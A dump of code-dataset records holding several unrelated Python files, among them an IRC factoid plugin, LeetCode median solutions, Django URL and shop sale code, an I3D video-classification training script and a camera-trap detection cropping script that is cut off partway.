'\"'+splitMSG[1]+'\" added.'\n\ndef fact_forget(inMSG):\n if getPermission(inMSG) < fact_setPermissions:\n return\n\n splitMSG = inMSG[0].split()\n if len(splitMSG) != 2:\n return\n\n if not delSetting('Facts', splitMSG[1]):\n return 'Error deleting \"'+splitMSG[1]+'\" (Probably doesn\\'t exist).'\n\n return '\"'+splitMSG[1]+'\" deleted.'\n\ndef fact_replace(inMSG):\n if getPermission(inMSG) < fact_setPermissions:\n return\n\n splitMSG = inMSG[0].split(None, 2)\n if len(splitMSG) != 3:\n return\n\n conn = sqlite3.connect(dbLoc)\n\n if not getSetting('Facts', splitMSG[1], conn):\n conn.close()\n return 'Factoid \"'+splitMSG[1]+'\" does not exist.'\n\n validResponse = fact_isValid(splitMSG[2], inMSG[1])\n\n if validResponse != True:\n conn.close()\n return validResponse\n\n setSetting('Facts', splitMSG[1], (splitMSG[2],), ('Value',), conn)\n conn.close()\n return '\"'+splitMSG[1]+'\" replaced.'\n\ndef fact_getFact(inMSG):\n if (not inMSG or len(inMSG) != 6 or getPermission(inMSG) < fact_usePermissions or\n len(inMSG[0]) < len(fact_prefix)+1 or inMSG[0][:len(fact_prefix)] != fact_prefix):\n return\n\n splitMSG = inMSG[0].split()\n if len(splitMSG) > 2:\n return\n elif len(splitMSG) == 2:\n who = splitMSG[1]\n else:\n who = inMSG[4]\n \n fact = getSetting('Facts', splitMSG[0][len(fact_prefix):])\n\n if fact:\n validResponse = fact_isValid(fact[0][1], inMSG[1])\n else:\n return\n\n if validResponse != True:\n sendMSG(validResponse, inMSG[1], inMSG[2], inMSG[3])\n\n validResponse = fact_getResponse(fact[0][1], inMSG[1])\n\n if validResponse:\n sendMSG(validResponse.replace('$inp$', who), inMSG[1], inMSG[2], inMSG[3])\n\ndef load():\n global funcs\n funcs = dict(list(funcs.items()) + [('rem',fact_remember), ('rep',fact_replace), ('f',fact_forget)])\n return fact_getFact\n","sub_path":"3.4/plugins/factoids.py","file_name":"factoids.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"115622866","text":"# 二分搜索 O(lgn)\nclass Solution(object):\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n length = len(nums1) + len(nums2)\n if length&0x1 == 1:\n return self.findKth(nums1, nums2, length/2+1)\n else:\n n1 = self.findKth(nums1, nums2, length/2+1)\n n2 = self.findKth(nums1, nums2, length/2)\n return (n1 + n2)/2.0\n\n def findKth(self, nums1, nums2, k):\n if len(nums1) > len(nums2):\n return self.findKth(nums2, nums1, k)\n if not nums1:\n return nums2[k-1]\n if k == 1:\n return min(nums1[0], nums2[0])\n in1 = min(len(nums1), k/2)\n in2 = k - in1\n if nums1[in1-1] == nums2[in2-1]:\n return nums1[in1-1]\n elif nums1[in1-1] < nums2[in2-1]:\n return self.findKth(nums1[in1:], nums2, k-in1)\n else:\n return self.findKth(nums1, nums2[in2:], k-in2)\n\n# 二路归并 O(n)\nclass Solution(object):\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n nums = self.merge(nums1, nums2)\n length = len(nums)\n if length%2 == 0:\n return (nums[length/2] + nums[length/2 -1])/2.0\n else:\n return nums[length/2]\n \n def merge(self, nums1, nums2):\n nums, length = [], len(nums1) + len(nums2)\n index1, index2 = 0, 0\n nums1.append(sys.maxint)\n nums2.append(sys.maxint)\n for i in range(length):\n if nums1[index1] < nums2[index2]:\n nums.append(nums1[index1])\n index1 += 1\n else:\n nums.append(nums2[index2])\n index2 += 1\n return nums\n","sub_path":"004_Median_of_Two_Sorted_Arrays/median_of_two_sorted_arrays.py","file_name":"median_of_two_sorted_arrays.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"187709053","text":"from django.conf.urls import url, include\nfrom django.contrib.auth import views as auth_views\n\nfrom adminio.views import *\n\nurlpatterns = [\n url(r'^$', index, name=\"index\"),\n # (r\"^media/(.+)\", static.serve, {\"document_root\": settings.MEDIA_ROOT}),\n url(r'^login/$', login_view),\n url(r'^logout/$', auth_views.logout, {'next_page': '/'}, name=\"logout\"),\n\n url(r'^journal/$', journal, name='journal'),\n url(r'^journal/object/$', object_journal, name='object_journal'),\n url(r'^journal/([^/]+)/$', journal_event, name='journal_record'),\n\n url(r'^global_groups/$', global_groups, name='global_groups'),\n url(r'^global_groups/add/$', global_group_edit, name='global_group_add'),\n url(r'^global_groups/([^/]+)/edit/$', global_group_edit, name='global_group_edit'),\n\n]\n","sub_path":"adminio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"575616296","text":"''' Test identifying faces for a POLYDATA model.\n'''\nimport sv\nimport sys\nimport vtk\nsys.path.insert(1, '../graphics/')\nimport graphics as gr\n\n## Create renderer and graphics window.\nwin_width = 500\nwin_height = 500\nrenderer, renderer_window = gr.init_graphics(win_width, win_height)\n\n## Create a modeler.\nfile_name = \"../data/models/cylinder.stl\"\nfile_name = \"../data/DemoProject/Models/demo.vtp\"\nmodeler = sv.modeling.Modeler(sv.modeling.Kernel.POLYDATA)\nmodel = modeler.read(file_name)\nprint(\"Model type: \" + str(type(model)))\n\n## Compute model face IDs for STL file.\nif 'stl' in file_name:\n face_ids = model.compute_boundary_faces(angle=60.0)\nface_ids = model.get_face_ids()\nprint(\"Number of model Face IDs: {0:d}\".format(len(face_ids)))\n#print(\"Model Face IDs: {0:s}\".format(str(face_ids)))\n\n## Identify the model faces caps.\nface_caps = model.identify_caps()\n#print(face_types)\n\n## Show the caps.\nnum_caps = 0\nfor face_id,is_cap in zip(face_ids, face_caps):\n face_polydata = model.get_face_polydata(face_id=face_id)\n if is_cap:\n gr.add_geometry(renderer, face_polydata, color=[1.0, 0.0, 0.0], wire=False)\n num_caps += 1\n else:\n gr.add_geometry(renderer, face_polydata, color=[0.0, 1.0, 0.0], wire=False)\n\nprint(\"Number of caps: \" + str(num_caps))\n\n# Display window.\ngr.display(renderer_window)\n\n","sub_path":"new-api-tests/modeling/identify-faces-polydata.py","file_name":"identify-faces-polydata.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"277814325","text":"from django.db import connection, models\nfrom django.db.models import F\nfrom django.db.models.signals import m2m_changed\nfrom django.dispatch import receiver\nfrom django.utils.translation import ugettext_lazy as _\nfrom future.builtins import super\nfrom mezzanine.conf import settings\n\nfrom ffcsa.shop.models import Product, ProductVariation\nfrom ffcsa.shop.models.Discount import Discount\n\n\nclass Sale(Discount):\n \"\"\"\n Stores sales field values for price and date range which when saved\n are then applied across products and variations according to the\n selected categories and products for the sale.\n \"\"\"\n\n class Meta:\n verbose_name = _(\"Sale\")\n verbose_name_plural = _(\"Sales\")\n\n def save(self, *args, **kwargs):\n super(Sale, self).save(*args, **kwargs)\n self.update_products()\n\n def update_products(self):\n \"\"\"\n Apply sales field value to products and variations according\n to the selected categories and products for the sale.\n \"\"\"\n self._clear()\n if self.active:\n extra_filter = {}\n if self.discount_deduct is not None:\n # Don't apply to prices that would be negative\n # after deduction.\n extra_filter[\"unit_price__gt\"] = self.discount_deduct\n sale_price = models.F(\"unit_price\") - self.discount_deduct\n elif self.discount_percent is not None:\n sale_price = models.F(\"unit_price\") - (\n F(\"unit_price\") / \"100.0\" * self.discount_percent)\n elif self.discount_exact is not None:\n # Don't apply to prices that are cheaper than the sale\n # amount.\n extra_filter[\"unit_price__gt\"] = self.discount_exact\n sale_price = self.discount_exact\n else:\n return\n products = self.all_products()\n variations = ProductVariation.objects.filter(product__in=products)\n for priced_objects in (products, variations):\n update = {\"sale_id\": self.id,\n \"sale_price\": sale_price,\n \"sale_to\": self.valid_to,\n \"sale_from\": self.valid_from}\n using = priced_objects.db\n if \"mysql\" not in settings.DATABASES[using][\"ENGINE\"]:\n priced_objects.filter(**extra_filter).update(**update)\n else:\n # Work around for MySQL which does not allow update\n # to operate on subquery where the FROM clause would\n # have it operate on the same table, so we update\n # each instance individually: http://bit.ly/1xMOGpU\n #\n # Also MySQL may raise a 'Data truncated' warning here\n # when doing a calculation that exceeds the precision\n # of the price column. In this case it's safe to ignore\n # it and the calculation will still be applied, but\n # we need to massage transaction management in order\n # to continue successfully: http://bit.ly/1xMOJCd\n for priced in priced_objects.filter(**extra_filter):\n for field, value in list(update.items()):\n setattr(priced, field, value)\n try:\n priced.save()\n except Warning:\n connection.set_rollback(False)\n\n def delete(self, *args, **kwargs):\n \"\"\"\n Clear this sale from products when deleting the sale.\n \"\"\"\n self._clear()\n super(Sale, self).delete(*args, **kwargs)\n\n def _clear(self):\n \"\"\"\n Clears previously applied sale field values from products prior\n to updating the sale, when deactivating it or deleting it.\n \"\"\"\n update = {\"sale_id\": None, \"sale_price\": None,\n \"sale_from\": None, \"sale_to\": None}\n for priced_model in (Product, ProductVariation):\n priced_model.objects.filter(sale_id=self.id).update(**update)\n\n\n@receiver(m2m_changed, sender=Sale.products.through)\ndef sale_update_products(sender, instance, action, *args, **kwargs):\n \"\"\"\n Signal for updating products for the sale - needed since the\n products won't be assigned to the sale when it is first saved.\n \"\"\"\n if action == \"post_add\":\n instance.update_products()\n","sub_path":"ffcsa/shop/models/Sale.py","file_name":"Sale.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"372441928","text":"n,m=map(int,input().split())\nab=[]\nfor i in range(m):\n ab.append(list(map(int,input().split())))\n\nans=0\ndef dfs(start,finish):\n global ans\n finish.add(start)#もう訪れたところ\n # print(finish)\n if len(finish)==n:#全部回ってたら終了\n ans+=1#橋じゃない数\n return \n for i in adlist[start-1]:\n\n if i not in finish:#通ったところに入っていないなら通れるということ \n dfs(i,finish)\n\nfor i in range(m):\n adlist=[]\n for h in range(n): \n adlist.append([])\n for j in range(m):\n if i!=j:\n x=ab[j][0]\n y=ab[j][1]\n adlist[x-1].append(y)\n adlist[y-1].append(x)\n finish=set()\n #print(adlist)\n dfs(1,finish)#引数がけすノード\n \n#print(adlist)\n\nprint(m-ans)\n\n\"\"\"\niのノードを消したときすべてのところを回れるかというう動作をn回繰り返す\nこればつ\nノードを消していたから違う線を消さなければならない\nだからそれぞれのはしがないと金の隣接リストを作らないイケナイ\n\"\"\"","sub_path":"ABC/75/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"618105934","text":"import h5py\nimport numpy as np\nfrom i3d_inception import Inception_Inflated3d\nimport keras\nfrom keras import optimizers\nfrom keras.callbacks import TensorBoard, ModelCheckpoint, CSVLogger\nfrom keras.preprocessing.image import ImageDataGenerator\n\nFRAME_HEIGHT = 224\nFRAME_WIDTH = 224\nNUM_FRAMES = 118\nNUM_CLASSES = 10\nBATCH = 4\n\n#Training I3D 5 module inception freeze transfer learning imagenet dan kinetic\n\nhf = h5py.File(\"sibi_rgb_normal.h5\",\"r\")\ntrain_label_file = open(\"train_sibi_1.txt\",\"r\")\ntest_label_file = open(\"test_validation_sibi_1.txt\",\"r\")\nvalidation_label_file = open(\"test_validation_sibi_1.txt\",\"r\")\ntrain_raw_labels = train_label_file.read().split(\"\\n\")\ntest_raw_labels = test_label_file.read().split(\"\\n\")\nvalidation_raw_labels = validation_label_file.read().split(\"\\n\")\ntrain_labels = keras.utils.to_categorical(np.array(train_raw_labels),num_classes = NUM_CLASSES)\ntest_labels = keras.utils.to_categorical(np.array(test_raw_labels),num_classes = NUM_CLASSES)\nvalidation_labels = keras.utils.to_categorical(np.array(validation_raw_labels),num_classes = NUM_CLASSES)\n\n\ndef generator(type):\n i=0\n counter = 0\n if type==\"train\":\n while True:\n batch_features = np.zeros((BATCH,NUM_FRAMES, FRAME_WIDTH, FRAME_HEIGHT,3))\n batch_labels = np.zeros((BATCH,NUM_CLASSES))\n for i in range(BATCH):\n batch_features[i] = hf[\"train\"][counter%120]\n batch_labels[i] = train_labels[counter%120]\n # print(\"Index: \"+str(i)+\", Counter: \"+str(counter))\n # print(batch_labels)\n counter+=1\n yield batch_features,batch_labels\n elif type==\"test\":\n while True:\n batch_features = np.zeros((1,NUM_FRAMES, FRAME_WIDTH, FRAME_HEIGHT,3))\n batch_labels = np.zeros((1,NUM_CLASSES))\n for i in range(1):\n batch_features[i] = hf[\"test\"][counter%40]\n batch_labels[i] = test_labels[counter%40]\n # print(\"Index: \"+str(i))\n # print(batch_labels)\n counter+=1\n yield batch_features,batch_labels\n elif type==\"validation\":\n while True:\n batch_features = np.zeros((BATCH,NUM_FRAMES, FRAME_WIDTH, FRAME_HEIGHT,3))\n batch_labels = np.zeros((BATCH,NUM_CLASSES))\n for i in range(BATCH):\n batch_features[i] = hf[\"validation\"][counter%40]\n batch_labels[i] = validation_labels[counter%40]\n # print(\"Index: \"+str(i))\n # print(batch_labels)\n counter+=1\n yield batch_features,batch_labels\n\nrgb_model = Inception_Inflated3d(\n include_top=False,\n weights='rgb_imagenet_and_kinetics',\n input_shape=(NUM_FRAMES, FRAME_HEIGHT, FRAME_WIDTH,3),\n classes=NUM_CLASSES,endpoint_logit=False)\n\nopt = optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=1e-6)\n\nindex_freeze_layer = [1,2,3,5,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,32,33,34,35,36,37,39,40,41,42,43,44,45,46,47,48,49,50,53,54,55,56,57,58,60,61,62,63,64,65,66,67,68,69,70,71,73,74,75,76,77,78,80,81,82,83,84,85,86,87,88,89,90,91,93,94,95,96,97,98,100,101,102,103,104,105,106,107,108,109,110,111]\ncc = 0\nfor layer in rgb_model.layers:\n print(\"Layer - \"+str(cc)+\" \"+layer.name)\n if cc in index_freeze_layer:\n print(\"jadi false\")\n layer.trainable = False\n print(\"Trainable = \"+str(layer.trainable)+\"\\n\")\n cc+=1\n\nrgb_model.summary()\n\nrgb_model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=opt,\n metrics=['accuracy'])\n\nbest_checkpoint = ModelCheckpoint('sibi_rgb_normal_4_weights_best.hdf5', monitor='val_acc', verbose=1, save_best_only=True, mode='max')\ncheckpoint = ModelCheckpoint('sibi_rgb_normal_4_weights_epoch.hdf5', monitor='val_acc', verbose=1, save_best_only=False, mode='max')\ncsv_logger = CSVLogger('sibi_rgb_normal_4.log', append=False)\ntensorboard = TensorBoard(log_dir='./sibi_rgb_normal_4_tf-logs')\ncallbacks_list = [checkpoint,best_checkpoint, csv_logger, tensorboard]\n\n\n# len(hf[\"train\"])\n# len(hf[\"validation\"])\n# rgb_model.fit_generator(generator(\"train\"), steps_per_epoch=120//BATCH, epochs=200, callbacks=callbacks_list,shuffle=True,validation_data = generator(\"validation\"),validation_steps=40//BATCH)\n\n# score = rgb_model.predict_generator(generator(\"test\"),steps=40)\n# np.save(\"sibi_rgb_normal_result_4\",score)\n# print('Test loss:', score[0])\n# print('Test accuracy:', score[1])\n\nhf.close()\n","sub_path":"train_sibi_rgb_normal_4.py","file_name":"train_sibi_rgb_normal_4.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"252661166","text":"class A:\n classvar1 = \"I am a class variable in class A\"\n def __init__(self):\n self.var1 = \"I am inside class A constructor\"\n self.classvar1 = \"Instance variable in class A\"\n self.special = \"Special\"\n\nclass B(A):\n classvar1 = \"I am in class B\"\n def __init__(self):\n #super().__init__() # Using super class here prints var1 and classvar1 values as mentioned inside class B constructor as the values are overwritten when class B runs\n self.var1 = \"I am inside class B constructor\"\n self.classvar1 = \"Instance variable in class B\"\n super().__init__() # Using super class here prints var1 and classvar1 values as mentioned inside class A constructor as the class A already ran above.\n\n\na = A()\nb = B()\nprint(b.special, b.var1, b.classvar1)\n\n","sub_path":"11c. Super() and Overriding.py","file_name":"11c. Super() and Overriding.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"622296111","text":"# Batch file for applying an object detection graph to a COCO style dataset,\n# cropping images to the detected animals inside and creating a COCO-\n# style classification dataset out of it. It also saves the detections \n# to a file using pickle\n\nimport numpy as np\nimport os\nimport tqdm\nimport pickle\nimport matplotlib; matplotlib.use('Agg')\nfrom pycocotools.coco import COCO\nfrom PIL import Image\nimport argparse\nimport random\nimport json\nimport sys\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)),\n '../../tfrecords/utils'))\nif sys.version_info.major >= 3:\n import create_tfrecords_py3 as tfr\nelse:\n import create_tfrecords as tfr\nimport uuid\n\nprint('If you run into import errors, please make sure you added \"models/research\" and ' +\\\n ' \"models/research/object_detection\" of the tensorflow models repo to the PYTHONPATH\\n\\n')\nimport tensorflow as tf\nfrom object_detection.utils import ops as utils_ops\nfrom utils import label_map_util\nfrom utils import visualization_utils as vis_util\nfrom distutils.version import StrictVersion\nif StrictVersion(tf.__version__) < StrictVersion('1.9.0'):\n raise ImportError('Please upgrade your TensorFlow installation to v1.9.* or later!')\n\n\n########################################################## \n### Configuration\n\n# Any model exported using the `export_inference_graph.py` tool can be loaded here simply by changing `PATH_TO_FROZEN_GRAPH` to point to a new .pb file. \nparser = argparse.ArgumentParser()\nparser.add_argument(\"input_json\", type=str, default='CaltechCameraTraps.json',\n help='COCO style dataset annotation')\nparser.add_argument('image_dir', type=str, default='./images/cct_images',\n help='Root folder of the images, as used in the annotations file')\nparser.add_argument('frozen_graph', type=str, default='frozen_inference_graph.pb',\n help='Frozen graph of detection network as create by export_inference_graph.py of TFODAPI.')\n#parser.add_argument('detections_output', type=str, default='detections_final.pkl',\n# help='Pickle file with the detections, which can be used for cropping later on.')\n\nparser.add_argument('--coco_style_output', type=str, default=None,\n help='Output directory for a dataset in COCO format.')\nparser.add_argument('--tfrecords_output', type=str, default=None,\n help='Output directory for a dataset in TFRecords format.')\nparser.add_argument('--location_key', type=str, default='location', metavar='location',\n help='Key in the image-level annotations that specifies the splitting criteria. ' + \\\n 'Usually we split camera-trap datasets by locations, i.e. training and testing locations. ' + \\\n 'In this case, you probably want to pass something like `--split_by location`. ' + \\\n 'The script prints the annotation of a randomly selected image which you can use for reference.')\n\nparser.add_argument('--exclude_categories', type=str, nargs='+', default=[],\n help='Categories to ignore. We will not run detection on images of that categorie and will ' + \\\n 'not use them for the classification dataset.')\nparser.add_argument('--use_detection_file', type=str, default=None,\n help='Uses existing detections from a file generated by this script. You can use this ' + \\\n 'to continue a partially processed dataset. ')\nparser.add_argument('--detection_threshold', type=float, default=0.5,\n help='Threshold for detections to use. Default is 0.5.')\nparser.add_argument('--padding_factor', type=float, default=1.3*1.3,\n help='We will crop a tight square box around the animal enlarged by this factor. ' + \\\n 'Default is 1.3 * 1.3 = 1.69, which accounts for the cropping at test time and for' + \\\n ' a reasonable amount of context')\nparser.add_argument('--test_fraction', type=float, default=0.2,\n help='Proportion of the locations used for testing, should be in [0,1]. Default: 0.2')\nparser.add_argument('--ims_per_record', type=int, default=200,\n help='Number of images to store in each tfrecord file')\nargs = parser.parse_args()\n\n\n##########################################################\n### The actual code\n\n# Check arguments\nINPUT_JSON = args.input_json\nassert os.path.exists(INPUT_JSON), INPUT_JSON + ' does not exist'\nIMAGE_DIR = args.image_dir\nassert os.path.exists(IMAGE_DIR), IMAGE_DIR + ' does not exist'\n# /ai4edevfs/models/object_detection/faster_rcnn_inception_resnet_v2_atrous/megadetector/frozen_inference_graph.pb\nPATH_TO_FROZEN_GRAPH = args.frozen_graph\nCOCO_OUTPUT_DIR = args.coco_style_output\nTFRECORDS_OUTPUT_DIR = args.tfrecords_output\nassert COCO_OUTPUT_DIR or TFRECORDS_OUTPUT_DIR, 'Please provide either --coco_style_output or --tfrecords_output'\nif COCO_OUTPUT_DIR:\n DETECTION_OUTPUT = os.path.join(COCO_OUTPUT_DIR, 'detections_final.pkl')\nelse:\n DETECTION_OUTPUT = os.path.join(TFRECORDS_OUTPUT_DIR, 'detections_final.pkl')\n\nDETECTION_INPUT = args.use_detection_file\nif DETECTION_INPUT:\n assert os.path.exists(DETECTION_INPUT), DETECTION_INPUT + ' does not exist'\n\nSPLIT_BY = args.location_key\nEXCLUDED_CATEGORIES = args.exclude_categories\n\n# Detection threshold should be in [0,1]\nDETECTION_THRESHOLD = args.detection_threshold\nassert DETECTION_THRESHOLD >= 0 and DETECTION_THRESHOLD <= 1, 'Detection threshold should be in [0,1]'\n\n# Padding around the detected objects when cropping\n# 1.3 for the cropping during test time and 1.3 for \n# the context that the CNN requires in the left-over \n# image\nPADDING_FACTOR = args.padding_factor\nassert PADDING_FACTOR >= 1, 'Padding factor should be equal or larger 1'\n\n# Fraction of locations used for testing\nTEST_FRACTION = args.test_fraction\nassert TEST_FRACTION >= 0 and TEST_FRACTION <= 1, 'test_fraction should be a value in [0,1]'\n\nIMS_PER_RECORD = args.ims_per_record\nassert IMS_PER_RECORD > 0, 'The number of images per shard should be greater than 0'\n\nTMP_IMAGE = str(uuid.uuid4()) + '.jpg'\n\n# Create output directories\nif COCO_OUTPUT_DIR and not os.path.exists(COCO_OUTPUT_DIR):\n print('Creating COCO-style dataset output directory.')\n os.makedirs(COCO_OUTPUT_DIR)\nif TFRECORDS_OUTPUT_DIR and not os.path.exists(TFRECORDS_OUTPUT_DIR):\n print('Creating TFRecords output directory.')\n os.makedirs(TFRECORDS_OUTPUT_DIR)\nif not os.path.exists(os.path.dirname(DETECTION_OUTPUT)):\n print('Creating output directory for detection file.')\n os.makedirs(os.path.dirname(DETECTION_OUTPUT))\n\n# Load a (frozen) Tensorflow model into memory.\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_FROZEN_GRAPH, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\ngraph = detection_graph\n\n# Load COCO style annotations from the input dataset\ncoco = COCO(INPUT_JSON)\n\n# Get all categories, their names, and create an updated ID for the json file \ncategories = coco.loadCats(coco.getCatIds())\ncat_id_to_names = {cat['id']:cat['name'] for cat in categories}\ncat_id_to_new_id = {old_key:idx for idx,old_key in enumerate(cat_id_to_names.keys())}\nprint('All categories: \\n\"{}\"\\n'.format('\", \"'.join(cat_id_to_names.values())))\nfor ignore_cat in EXCLUDED_CATEGORIES:\n assert ignore_cat in cat_id_to_names.values(), 'Category %s does not exist in the dataset'%ignore_cat\n\n\n# Prepare the coco-style json files\ntraining_json = dict(images=[], categories=[], annotations=[])\ntest_json = dict(images=[], categories=[], annotations=[])\n\nfor old_cat_id in cat_id_to_names.keys():\n training_json['categories'].append(dict(id = cat_id_to_new_id[old_cat_id], \n name=cat_id_to_names[old_cat_id],\n supercategory='entity'))\ntest_json['categories'] = training_json['categories']\n\n# Split the dataset by locations\nrandom.seed(0)\nprint('Example of the annotation of a single image:')\nprint(list(coco.imgs.items())[0])\nprint('The corresponding category annoation:')\nprint(coco.imgToAnns[list(coco.imgs.items())[0][0]])\nlocations = set([ann[SPLIT_BY] for ann in coco.imgs.values()])\ntest_locations = sorted(random.sample(sorted(locations), max(1, int(TEST_FRACTION * len(locations)))))\ntraining_locations = sorted(list(set(locations) - set(test_locations)))\nprint('{} locations in total, {} will be used for training, {} for testing'.format(len(locations), \n len(training_locations),\n len(test_locations)))\nprint('Training uses locations ', sorted(training_locations))\nprint('Testing uses locations ', sorted(test_locations))\n\n# Load detections\nif DETECTION_INPUT:\n print('Loading existing detections from ' + DETECTION_INPUT)\n with open(DETECTION_INPUT, 'rb') as f:\n detections = pickle.load(f)\nelse:\n detections = dict()\n\n# TFRecords variables\nclass TFRecordsWriter(object):\n def __init__(self, output_file, ims_per_record):\n self.output_file = output_file\n self.ims_per_record = ims_per_record\n self.next_shard_idx = 0\n self.next_shard_img_idx = 0\n self.coder = tfr.ImageCoder()\n self.writer = None\n\n def add(self, data):\n if self.next_shard_img_idx % self.ims_per_record == 0:\n if self.writer:\n self.writer.close()\n self.writer = tf.python_io.TFRecordWriter(self.output_file%self.next_shard_idx)\n self.next_shard_idx = self.next_shard_idx + 1\n image_buffer, height, width = tfr._process_image(data['filename'], self.coder)\n example = tfr._convert_to_example(data, image_buffer, data['height'], data['width'])\n self.writer.write(example.SerializeToString())\n self.next_shard_img_idx = self.next_shard_img_idx + 1\n\n def close(self):\n if self.next_shard_idx == 0 and self.next_shard_img_idx == 0:\n print('WARNING: No images were written to tfrecords!')\n if self.writer:\n self.writer.close()\n\nif TFRECORDS_OUTPUT_DIR:\n training_tfr_writer = TFRecordsWriter(os.path.join(TFRECORDS_OUTPUT_DIR, 'train-%.5d'), IMS_PER_RECORD)\n test_tfr_writer = TFRecordsWriter(os.path.join(TFRECORDS_OUTPUT_DIR, 'test-%.5d'), IMS_PER_RECORD)\nelse:\n training_tfr_writer = None\n test_tfr_writer = None\n\n# The detection part\nimages_missing = False\nwith graph.as_default():\n with tf.Session() as sess:\n ### Preparations: get all the output tensors\n ops = tf.get_default_graph().get_operations()\n all_tensor_names = {output.name for op in ops for output in op.outputs}\n tensor_dict = {}\n for key in [\n 'num_detections', 'detection_boxes', 'detection_scores',\n 'detection_classes'\n ]:\n tensor_name = key + ':0'\n if tensor_name in all_tensor_names:\n tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(\n tensor_name)\n if 'detection_masks' in tensor_dict:\n # The following processing is only for single image\n detection_boxes = tf.squeeze(tensor_dict['detection_boxes'], [0])\n # Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.\n real_num_detection = tf.cast(tensor_dict['num_detections'][0], tf.int32)\n detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])\n image_tensor = tf.get_default_graph().get_tensor_by_name('image_tensor:0')\n\n # For all images listed in the annotations file\n next_image_id = 0\n next_annotation_id = 0\n for cur_image_id in tqdm.tqdm(list(sorted([vv['id'] for vv in coco.imgs.values()]))):\n cur_image = coco.loadImgs([cur_image_id])[0]\n cur_file_name = cur_image['file_name']\n # Path to the input image\n in_file = os.path.join(IMAGE_DIR, cur_file_name)\n # Skip the image if it is annotated with more than one category\n if len(set([ann['category_id'] for ann in coco.imgToAnns[cur_image['id']]])) != 1:\n continue\n # Get category ID for this image\n cur_cat_id = coco.imgToAnns[cur_image['id']][0]['category_id']\n # ... and the corresponding category name\n cur_cat_name = cat_id_to_names[cur_cat_id]\n # The remapped category ID for our json file\n cur_json_cat_id = cat_id_to_new_id[cur_cat_id]\n # Whether it belongs to a training or testing location\n is_train = cur_image[SPLIT_BY] in training_locations\n\n # Skip excluded categories\n if cur_cat_name in EXCLUDED_CATEGORIES:\n continue\n\n # If we already have detection results, we can use them\n if cur_image_id in detections.keys():\n output_dict = detections[cur_image_id]\n # Otherwise run detector\n else:\n # We allow to skip images, which we do not have available right now\n # This is useful for processing parts of large datasets\n if not os.path.isfile(os.path.join(IMAGE_DIR, cur_file_name)):\n if not images_missing:\n print('Could not find ' + cur_file_name)\n print('Suprresing any further warnings about missing files.')\n images_missing = True\n continue\n\n # Load image\n image = np.array(Image.open(os.path.join(IMAGE_DIR, cur_file_name)))\n if image.dtype != np.uint8:\n print('Failed to load image ' + cur_file_name)\n continue\n\n # Run inference\n output_dict = sess.run(tensor_dict,\n feed_dict={image_tensor: np.expand_dims(image, 0)})\n\n # all outputs are float32 numpy arrays, so convert types as appropriate\n output_dict['num_detections'] = int(output_dict['num_detections'][0])\n output_dict['detection_classes'] = output_dict[\n 'detection_classes'][0].astype(np.uint8)\n output_dict['detection_boxes'] = output_dict['detection_boxes'][0]\n output_dict['detection_scores'] = output_dict['detection_scores'][0]\n if 'detection_masks' in output_dict:\n output_dict['detection_masks'] = output_dict['detection_masks'][0]\n\n # Add detections to the collection\n detections[cur_image_id] = output_dict\n\n imsize = cur_image['width'], cur_image['height']\n # Select detections with a confidence larger DETECTION_THRESHOLD\n selection = output_dict['detection_scores'] > DETECTION_THRESHOLD\n # Skip if no detection selected\n if np.sum(selection) < 1 or selection.size == 0:\n continue\n # Get these boxes and convert normalized coordinates to pixel coordinates\n selected_boxes = (output_dict['detection_boxes'][selection] * np.tile([imsize[1],imsize[0]], (1,2)))\n # Pad the detected animal to a square box and additionally by PADDING_FACTOR, the result will be in crop_boxes\n # However, we need to make sure that it box coordinates are still within the image\n bbox_sizes = np.vstack([selected_boxes[:,2] - selected_boxes[:,0], selected_boxes[:,3] - selected_boxes[:,1]]).T\n offsets = (PADDING_FACTOR * np.max(bbox_sizes, axis=1, keepdims=True) - bbox_sizes) / 2\n crop_boxes = selected_boxes + np.hstack([-offsets,offsets])\n crop_boxes = np.maximum(0,crop_boxes).astype(int)\n # For each detected bounding box with high confidence, we will\n # crop the image to the padded box and save it\n for box_id in range(selected_boxes.shape[0]):\n # bbox is the detected box, crop_box the padded / enlarged box\n bbox, crop_box = selected_boxes[box_id], crop_boxes[box_id]\n if COCO_OUTPUT_DIR:\n # The file path as it will appear in the annotation json\n new_file_name = os.path.join(cur_cat_name, cur_file_name)\n # Add numbering to the original file name if there are multiple boxes\n if selected_boxes.shape[0] > 1:\n new_file_base, new_file_ext = os.path.splitext(new_file_name)\n new_file_name = 